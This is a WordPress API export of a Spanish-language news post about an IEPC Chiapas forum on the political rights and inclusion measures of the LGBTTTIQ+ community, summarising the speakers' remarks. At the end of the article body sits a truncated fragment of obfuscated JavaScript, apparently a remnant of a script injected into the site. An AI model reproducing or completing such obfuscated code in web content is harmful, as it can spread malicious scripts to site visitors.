{"id":1777,"date":"2022-04-30T03:07:17","date_gmt":"2022-04-30T03:07:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1777"},"modified":"2022-05-11T01:44:20","modified_gmt":"2022-05-11T01:44:20","slug":"trabaja-iepc-en-la-agenda-de-medidas-de-inclusion-con-foro-para-visibilizar-derechos-de-la-comunidad-lgbtttiq","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1777","title":{"rendered":"Trabaja IEPC en la agenda de medidas de inclusi\u00f3n con Foro para visibilizar derechos de la comunidad LGBTTTIQ"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651287686451-1024x576.jpg\" alt=\"\" class=\"wp-image-1778\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651287686451-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651287686451-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651287686451-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1651287686451.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 El objetivo de este Foro, fue el de visibilizar la agenda en materia de derechos de grupos en estados de vulnerabilidad contando con la presencia de especialistas de la UNACH y TEPJF, que impulsan la protecci\u00f3n de derechos pol\u00edticos y electorales de dichos grupos.<\/p>\n\n\n\n<p>30 de Abril del 2022. El Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) de Chiapas, llev\u00f3 a cabo el Foro: \u201cDerechos pol\u00edticos de grupos en estado de vulnerabilidad: medidas de inclusi\u00f3n de la comunidad LGBTTTIQ+ (Lesbianas, Gays, Bisexuales, Travestis, Transg\u00e9neros, Transexuales, Intersexuales y Queer)\u201d, con la participaci\u00f3n de Maricela Hazel Pacheco Pazos, Directora de la Defensor\u00eda de Derechos Universitarios y Humanos de la Universidad Aut\u00f3noma de Chiapas (UNACH); Juan Carlos Cuervo, Consultor en materia de inclusi\u00f3n y no discriminaci\u00f3n; y Luis Octavio Vado Grajales, Investigador de la Escuela Judicial Electoral (EJE) del Tribunal Electoral del Poder Judicial de la Federaci\u00f3n (TEPJF).<\/p>\n\n\n\n<p>La realizaci\u00f3n de este espacio fue pensada para visibilizar la agenda en materia de derechos de grupos en contexto de vulnerabilidad, con la presencia de especialistas que impulsan la protecci\u00f3n de derechos pol\u00edticos y electorales de dichos grupos, y para conocer el trabajo de Instituciones como generadoras de medidas de inclusi\u00f3n para garantizar el ejercicio de los derechos de los grupos mencionados.<\/p>\n\n\n\n<p>El consejero presidente Oswaldo Chac\u00f3n Rojas inici\u00f3 se\u00f1alando que, en el IEPC, se trabaja con el compromiso de entender los temas de inclusi\u00f3n para garantizar los derechos de todas las personas. \u201cLos avances en la agenda progresista deben seguir siempre hacia adelante, y la mejor manera de conseguirlo es difundir y visibilizar estos temas para que haya mucha claridad al momento de tomar decisiones por parte de las instituciones\u201d: A\u00f1adi\u00f3 que debe valorarse en todo momento la posibilidad de manifestarse libremente en cualquier democracia para evitar que haya restricciones que no abonen a la construcci\u00f3n c\u00edvica, con la finalidad de aportar ideas que eleven el debate en materia de inclusi\u00f3n.<\/p>\n\n\n\n<p>La consejera Sof\u00eda Mart\u00ednez De Castro Le\u00f3n, Presidenta de la Comisi\u00f3n Provisional de Igualdad de G\u00e9nero y No Discriminaci\u00f3n, record\u00f3 que la importancia de estos temas radica en el poco o nulo respeto que existe a los derechos de las personas trans, lo cual se refleja en la Encuesta Nacional sobre Discriminaci\u00f3n 2017 (ENADIS), que se\u00f1ala que en Chiapas es una de las entidades con m\u00e1s del 70% de las personas encuestadas que perciben lo mencionado, debiendo generar la construcci\u00f3n de mejores escenarios de inclusi\u00f3n. \u201cPor lo anterior, es trascendental fortalecer la democracia con inclusi\u00f3n, y la edificaci\u00f3n de medidas afirmativas y pol\u00edticas p\u00fablicas que permitan el avance de la sociedad en su conjunto\u201d.<\/p>\n\n\n\n<p>En su exposici\u00f3n, Maricela Hazel Pacheco Pazos coment\u00f3 de manera enf\u00e1tica que los derechos y las identidades no se discuten. \u201cNegar el reconocimiento de la identidad sexual de cualquier persona es una violaci\u00f3n a sus derechos; no tendr\u00edamos que hablar de estos temas, pero la discriminaci\u00f3n vuelve necesario el visibilizar estos derechos en particular\u201d. Agreg\u00f3 que las personas integrantes de la LGBTTTIQ+ deben poder ejercer todos sus derechos, no solamente algunos. Record\u00f3 que el Instituto Nacional Electoral (INE) es una de las instituciones que cuenta con un Protocolo de c\u00f3mo se debe tratar a estas personas para el reconocimiento de sus derechos pol\u00edticos y electorales.<\/p>\n\n\n\n<p>Por su parte, Juan Carlos Cuervo, afirm\u00f3 que la inclusi\u00f3n no es un proyecto de instituciones caritativas para dar apoyo a quien no lo tiene, sino que se trata de una responsabilidad del Estado Mexicano, que consiste en reconocer la riqueza de la diversidad y actuar en consecuencia. \u201cLa igualdad y la garant\u00eda de los derechos pol\u00edticos y electorales no son concesiones, m\u00e1s bien son obligaciones de las autoridades electorales\u201d. Dijo que ser\u00eda de mucho avance que para la elecci\u00f3n federal de 2024, INE y TEPJF hagan los estudios correspondientes a efecto de que en tiempo y forma se establezcan las acciones afirmativas que deber\u00e1n cumplir los partidos pol\u00edticos.<\/p>\n\n\n\n<p>Luis Octavio Vado Grajales acot\u00f3 que, no solo la Constituci\u00f3n proh\u00edbe la discriminaci\u00f3n y fomenta la idea de igualdad; sino que adem\u00e1s, el Estado Mexicano tiene el fundamento y compromiso adquirido ante la Convenci\u00f3n Interamericana contra toda forma de Discriminaci\u00f3n e Intolerancia, donde los Estados Partes est\u00e1n comprometidos a asegurar que sus sistemas pol\u00edticos reflejen apropiadamente la diversidad dentro de sus sociedades a fin de atender las necesidades especiales leg\u00edtimas de cada sector de la poblaci\u00f3n. Apunt\u00f3 que los partidos pol\u00edticos tambi\u00e9n tienen la obligaci\u00f3n de postular a personas de la comunidad LGBTTTIQ+, pues tienen el deber de fomentar la participaci\u00f3n popular en la vida democr\u00e1tica.<\/p>\n\n\n\n<p>La consejera Sof\u00eda Margarita S\u00e1nchez Dom\u00ednguez invit\u00f3 a las personas de la comunidad LGBTTTIQ+ se acerquen al IEPC para ser escuchadas, y as\u00ed fortalecer el ejercicio de sus derechos. \u201cSe requiere visibilizar y hacer estudios, escuchando a las personas de la diversidad sexual para garantizar derechos, evitando la simulaci\u00f3n y la usurpaci\u00f3n que tratar\u00e1n de buscar algunos grupos\u201d. Como parte de las conclusiones del Foro, record\u00f3 que las medidas afirmativas son acciones \u00f3ptimas; tambi\u00e9n dijo que \u201chablar de igualdades exige del estado, la ejecuci\u00f3n para reducir las desigualdades y en eso, las autoridades electorales y jurisdiccionales tenemos una gran responsabilidad\u201d.<\/p>\n\n\n\n<p>En este espacio, fueron presentes organizaciones de la sociedad civil, representantes de partidos pol\u00edticos e instituciones, tambi\u00e9n particip\u00f3 Gloria Esther Mendoza Ledesma, Titular de la Unidad T\u00e9cnica de G\u00e9nero y No Discriminaci\u00f3n, como moderadora. Para volver a ver el Foro \u00edntegramente, se puede acceder al link: https:\/\/www.youtube.com\/watch?v=CkDPgD2-cp0.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El objetivo de este Foro, fue el de visibilizar la agenda en materia de derechos de grupos en estados de vulnerabilidad contando con la presencia de especialistas de la UNACH y TEPJF, que impulsan la protecci\u00f3n de derechos pol\u00edticos y electorales de dichos grupos. 30 de Abril del 2022. El Instituto de Elecciones y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1778,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1777","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1777","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1777"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1777\/revisions"}],"predecessor-version":[{"id":2035,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1777\/revisions\/2035"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1778"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1777"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1777"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}